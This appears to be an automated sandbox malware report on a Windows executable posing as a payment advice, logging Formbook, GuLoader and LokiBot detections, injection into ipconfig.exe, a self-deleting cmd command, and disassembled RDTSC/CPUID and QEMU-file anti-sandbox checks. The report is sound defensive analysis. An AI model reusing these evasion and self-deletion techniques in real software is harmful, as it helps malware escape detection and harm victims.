Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_03649770 NtSetInformationFile,	19_2_03649770
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_03649730 NtQueryVirtualMemory,	19_2_03649730
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_03649710 NtQueryInformationToken,	19_2_03649710
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_0364A710 NtOpenProcessToken,	19_2_0364A710
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_036497A0 NtUnmapViewOfSection,	19_2_036497A0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_03649780 NtMapViewOfSection,	19_2_03649780
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_03649660 NtAllocateVirtualMemory,	19_2_03649660
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_03649670 NtQueryInformationProcess,	19_2_03649670
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_03649650 NtQueryValueKey,	19_2_03649650
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_03649610 NtEnumerateValueKey,	19_2_03649610
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_036496D0 NtCreateKey,	19_2_036496D0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_03649560 NtWriteFile,	19_2_03649560
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_03649520 NtWaitForSingleObject,	19_2_03649520
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_0364AD30 NtSetContextThread,	19_2_0364AD30
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_036495F0 NtQueryInformationFile,	19_2_036495F0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_02DE82E0 NtClose,	19_2_02DE82E0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_02DE8260 NtReadFile,	19_2_02DE8260
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_02DE81B0 NtCreateFile,	19_2_02DE81B0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_02DE82DC NtClose,	19_2_02DE82DC
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_02DE825A NtReadFile,	19_2_02DE825A
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_02DE81AA NtCreateFile,	19_2_02DE81AA

Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3C6E30	10_2_1E3C6E30
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E472EF7	10_2_1E472EF7
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E4722AE	10_2_1E4722AE
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E472B28	10_2_1E472B28
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3DEBB0	10_2_1E3DEBB0
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E471FF1	10_2_1E471FF1
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3B841F	10_2_1E3B841F
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E461002	10_2_1E461002
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3D20A0	10_2_1E3D20A0
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3BB090	10_2_1E3BB090
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E4720A8	10_2_1E4720A8
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E471D55	10_2_1E471D55
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3A0D20	10_2_1E3A0D20
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3C4120	10_2_1E3C4120
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3AF900	10_2_1E3AF900
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E472D07	10_2_1E472D07
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3D2581	10_2_1E3D2581
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3BD5E0	10_2_1E3BD5E0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_0362AB40	19_2_0362AB40
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_036ACB4F	19_2_036ACB4F
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_036D2B28	19_2_036D2B28
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_0362A309	19_2_0362A309
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_036C231B	19_2_036C231B
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_036B23E3	19_2_036B23E3
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_03658BE8	19_2_03658BE8
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_036C03DA	19_2_036C03DA
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_0363ABD8	19_2_0363ABD8
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_036CDBD2	19_2_036CDBD2
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_0363EBB0	19_2_0363EBB0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_036AEB8A	19_2_036AEB8A
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_0363138B	19_2_0363138B
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_0362EB9A	19_2_0362EB9A
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_036BFA2B	19_2_036BFA2B
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_0362B236	19_2_0362B236
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_036C4AEF	19_2_036C4AEF
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_036CE2C5	19_2_036CE2C5
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_036D22AE	19_2_036D22AE
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_036D32A9	19_2_036D32A9
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_03624120	19_2_03624120
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_0360F900	19_2_0360F900
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_036299BF	19_2_036299BF
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_036DE824	19_2_036DE824
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_0362A830	19_2_0362A830
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_03606800	19_2_03606800
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_036C1002	19_2_036C1002
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_036D28EC	19_2_036D28EC
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_036320A0	19_2_036320A0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_036D20A8	19_2_036D20A8
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_0361B090	19_2_0361B090
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_036C67E2	19_2_036C67E2
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_036D1FF1	19_2_036D1FF1
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_036DDFCE	19_2_036DDFCE
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_03626E30	19_2_03626E30
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_03625600	19_2_03625600
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_036CD616	19_2_036CD616
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_036D2EF7	19_2_036D2EF7
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_036B1EB6	19_2_036B1EB6
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_036D1D55	19_2_036D1D55
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_03600D20	19_2_03600D20
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_036D2D07	19_2_036D2D07
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_0361D5E0	19_2_0361D5E0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_036D25DD	19_2_036D25DD
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_036365A0	19_2_036365A0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_03632581	19_2_03632581
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_036C2D82	19_2_036C2D82
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_036CD466	19_2_036CD466
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_0362B477	19_2_0362B477
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_0361841F	19_2_0361841F
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_036C4496	19_2_036C4496
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_02DEBA43	19_2_02DEBA43
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_02DD2FB0	19_2_02DD2FB0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_02DEBFA7	19_2_02DEBFA7
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_02DEB755	19_2_02DEB755
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_02DEBCD0	19_2_02DEBCD0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_02DD8C50	19_2_02DD8C50
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_02DD8C4B	19_2_02DD8C4B
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_02DD2D90	19_2_02DD2D90

Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: String function: 03695720 appears 38 times
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: String function: 0365D08C appears 39 times
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: String function: 0360B150 appears 154 times
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: String function: 1E3AB150 appears 35 times
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: String function: 0040172E appears 35 times

Source: payment advice_mt103645367.exe

Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: payment advice_mt103645367.exe, 00000000.00000002.375424938.0000000002A30000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameillusive.exeFE2X vs payment advice_mt103645367.exe
Source: payment advice_mt103645367.exe, 00000000.00000002.375424938.0000000002A30000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameillusive.exeFE2X7q vs payment advice_mt103645367.exe
Source: payment advice_mt103645367.exe, 00000000.00000002.375424938.0000000002A30000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameillusive.exeFE2X~p vs payment advice_mt103645367.exe
Source: payment advice_mt103645367.exe, 00000000.00000002.375424938.0000000002A30000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameillusive.exeFE2XRu vs payment advice_mt103645367.exe
Source: payment advice_mt103645367.exe, 00000000.00000002.375424938.0000000002A30000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameillusive.exeFE2X$t vs payment advice_mt103645367.exe
Source: payment advice_mt103645367.exe, 00000000.00000002.374425259.000000000042A000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameillusive.exe vs payment advice_mt103645367.exe
Source: payment advice_mt103645367.exe, 00000000.00000002.375025108.00000000022C0000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameuser32j% vs payment advice_mt103645367.exe
Source: payment advice_mt103645367.exe, 0000000A.00000002.490528036.000000001DC60000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamemswsock.dll.muij% vs payment advice_mt103645367.exe
Source: payment advice_mt103645367.exe, 0000000A.00000002.490581294.000000001DDB0000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs payment advice_mt103645367.exe
Source: payment advice_mt103645367.exe, 0000000A.00000002.492644478.000000001E62F000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs payment advice_mt103645367.exe
Source: payment advice_mt103645367.exe, 0000000A.00000000.373609554.000000000042A000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameillusive.exe vs payment advice_mt103645367.exe
Source: payment advice_mt103645367.exe, 0000000A.00000002.486757216.00000000000B7000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenameipconfig.exej% vs payment advice_mt103645367.exe
Source: payment advice_mt103645367.exe	Binary or memory string: OriginalFilenameillusive.exe vs payment advice_mt103645367.exe

Source: payment advice_mt103645367.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: 00000013.00000002.497327115.0000000003B17000.00000004.00000001.sdmp, type: MEMORY	Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000002.490754854.000000001E150000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000002.490754854.000000001E150000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000013.00000002.495160513.0000000002DD0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000013.00000002.495160513.0000000002DD0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000002.486705428.0000000000080000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000002.486705428.0000000000080000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000013.00000002.495667904.00000000031B0000.00000004.00000020.sdmp, type: MEMORY	Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/

Source: classification engine

Classification label: mal100.rans.troj.spyw.evad.winEXE@6/0@1/1

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1564:120:WilError_01

Source: payment advice_mt103645367.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\payment advice_mt103645367.exe

Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Jump to behavior

Source: C:\Users\user\Desktop\payment advice_mt103645367.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: payment advice_mt103645367.exe	Virustotal: Detection: 30%
Source: payment advice_mt103645367.exe	ReversingLabs: Detection: 19%

Source: unknown	Process created: C:\Users\user\Desktop\payment advice_mt103645367.exe 'C:\Users\user\Desktop\payment advice_mt103645367.exe'
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Process created: C:\Users\user\Desktop\payment advice_mt103645367.exe 'C:\Users\user\Desktop\payment advice_mt103645367.exe'
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
Source: C:\Windows\SysWOW64\ipconfig.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\payment advice_mt103645367.exe'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\ipconfig.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\payment advice_mt103645367.exe'	Jump to behavior

Source:	Binary string: ipconfig.pdb source: payment advice_mt103645367.exe, 0000000A.00000002.486746256.00000000000B0000.00000040.00000001.sdmp
Source:	Binary string: ipconfig.pdbGCTL source: payment advice_mt103645367.exe, 0000000A.00000002.486746256.00000000000B0000.00000040.00000001.sdmp
Source:	Binary string: wscui.pdbUGP source: explorer.exe, 00000010.00000000.473834732.000000000E1C0000.00000002.00000001.sdmp
Source:	Binary string: wntdll.pdbUGP source: payment advice_mt103645367.exe, 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp, ipconfig.exe, 00000013.00000002.496605344.00000000036FF000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: payment advice_mt103645367.exe, ipconfig.exe
Source:	Binary string: wscui.pdb source: explorer.exe, 00000010.00000000.473834732.000000000E1C0000.00000002.00000001.sdmp

Data Obfuscation:

Yara detected GuLoader

Show sources

Source: Yara match	File source: 0000000A.00000002.486789978.0000000000562000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: payment advice_mt103645367.exe PID: 2440, type: MEMORY

Yara detected VB6 Downloader Generic

Show sources

Source: Yara match

File source: Process Memory Space: payment advice_mt103645367.exe PID: 2440, type: MEMORY

Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 0_2_0040B858 push ebx; iretw	0_2_0040B86A
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 0_2_0040A66C push ebx; retf	0_2_0040A67E
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 0_2_00409E24 push ebx; retf	0_2_00409E26
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 0_2_0040AACF push ebx; retf	0_2_0040AAD2
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 0_2_00408880 push ebx; retf	0_2_00408882
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 0_2_0040A68B push ebx; retf	0_2_0040A67E
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 0_2_0040A68B push ebx; retf	0_2_0040A69A
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 0_2_004096B8 push ecx; iretd	0_2_004096C6
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 0_2_00408B76 push ebx; retf	0_2_00408C42
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 0_2_004083C0 push ebx; retf	0_2_004083C6
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 0_2_0040B7C7 push ebx; retf	0_2_0040B7CA
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 0_2_0040B78A push FFFFFFA7h; retf	0_2_0040B79F
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 0_2_0040A190 push edx; iretd	0_2_0040A19E
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 0_2_004083BB push ebx; retf	0_2_004083BE
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3FD0D1 push ecx; ret	10_2_1E3FD0E4
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_00568ED4 push edx; retf	10_2_00568ED3
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_00568EC5 push edx; retf	10_2_00568ED3
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_0365D0D1 push ecx; ret	19_2_0365D0E4
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_02DEB3FB push eax; ret	19_2_02DEB462
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_02DEB3F2 push eax; ret	19_2_02DEB3F8
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_02DEB3A5 push eax; ret	19_2_02DEB3F8
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_02DEC7A4 push dword ptr [2E33947Ah]; ret	19_2_02DEC7A3
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_02DEB45C push eax; ret	19_2_02DEB462
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_02DEC547 push dword ptr [2E33947Ah]; ret	19_2_02DEC7A3

Persistence and Installation Behavior:

Uses ipconfig to lookup or modify the Windows network settings

Show sources

Source: C:\Windows\explorer.exe

Process created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe

Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Contains functionality to detect hardware virtualization (CPUID execution measurement)

Show sources

Source: C:\Users\user\Desktop\payment advice_mt103645367.exe

Code function: 10_2_00562B72

10_2_00562B72

Detected RDTSC dummy instruction sequence (likely for instruction hammering)

Show sources

Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	RDTSC instruction interceptor: First address: 0000000000530695 second address: 0000000000530695 instructions:
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	RDTSC instruction interceptor: First address: 0000000000534C11 second address: 0000000000534C11 instructions:
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	RDTSC instruction interceptor: First address: 0000000000535A32 second address: 0000000000535A32 instructions:
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	RDTSC instruction interceptor: First address: 00000000005620CB second address: 00000000005620CB instructions:
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	RDTSC instruction interceptor: First address: 00000000005622AD second address: 00000000005688D9 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a push dword ptr [ebp+24h] 0x0000000d cmp al, 22h 0x0000000f call 00007F1E147FD4EAh 0x00000014 jmp 00007F1E147F706Eh 0x00000016 jmp 00007F1E147F7078h 0x00000018 call 00007F1E147F7035h 0x0000001d pop ebx 0x0000001e sub ebx, 05h 0x00000021 jmp 00007F1E147F706Eh 0x00000023 cmp ebx, edx 0x00000025 inc ebx 0x00000026 dec ebx 0x00000027 xor edx, edx 0x00000029 jmp 00007F1E147F7076h 0x0000002b cmp bh, ch 0x0000002d mov eax, ebx 0x0000002f jmp 00007F1E147F7072h 0x00000031 pushad 0x00000032 lfence 0x00000035 rdtsc

Tries to detect Any.run

Show sources

Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe			Jump to behavior
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	File opened: C:\Program Files\qga\qga.exe			Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: payment advice_mt103645367.exe	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: payment advice_mt103645367.exe, 00000000.00000002.374597434.00000000006EA000.00000004.00000020.sdmp	Binary or memory string: 0 FILES\QEMU-GA\QEMU-GA.EXE_

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	RDTSC instruction interceptor: First address: 0000000000530695 second address: 0000000000530695 instructions:
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	RDTSC instruction interceptor: First address: 0000000000534C11 second address: 0000000000534C11 instructions:
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	RDTSC instruction interceptor: First address: 0000000000535A32 second address: 0000000000535A32 instructions:
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	RDTSC instruction interceptor: First address: 00000000005620CB second address: 00000000005620CB instructions:
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	RDTSC instruction interceptor: First address: 00000000005622AD second address: 00000000005688D9 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a push dword ptr [ebp+24h] 0x0000000d cmp al, 22h 0x0000000f call 00007F1E147FD4EAh 0x00000014 jmp 00007F1E147F706Eh 0x00000016 jmp 00007F1E147F7078h 0x00000018 call 00007F1E147F7035h 0x0000001d pop ebx 0x0000001e sub ebx, 05h 0x00000021 jmp 00007F1E147F706Eh 0x00000023 cmp ebx, edx 0x00000025 inc ebx 0x00000026 dec ebx 0x00000027 xor edx, edx 0x00000029 jmp 00007F1E147F7076h 0x0000002b cmp bh, ch 0x0000002d mov eax, ebx 0x0000002f jmp 00007F1E147F7072h 0x00000031 pushad 0x00000032 lfence 0x00000035 rdtsc
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	RDTSC instruction interceptor: First address: 00000000005627E7 second address: 00000000005688D9 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b push FFFFFFFFh 0x0000000d test ah, ch 0x0000000f push dword ptr [ebp+24h] 0x00000012 test bx, bx 0x00000015 call 00007F1E14BBEEBAh 0x0000001a jmp 00007F1E14BB8F7Eh 0x0000001c jmp 00007F1E14BB8F88h 0x0000001e call 00007F1E14BB8F45h 0x00000023 pop ebx 0x00000024 sub ebx, 05h 0x00000027 jmp 00007F1E14BB8F7Eh 0x00000029 cmp ebx, edx 0x0000002b inc ebx 0x0000002c dec ebx 0x0000002d xor edx, edx 0x0000002f jmp 00007F1E14BB8F86h 0x00000031 cmp bh, ch 0x00000033 mov eax, ebx 0x00000035 jmp 00007F1E14BB8F82h 0x00000037 pushad 0x00000038 lfence 0x0000003b rdtsc
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	RDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	RDTSC instruction interceptor: First address: 000000000040896E second address: 0000000000408974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
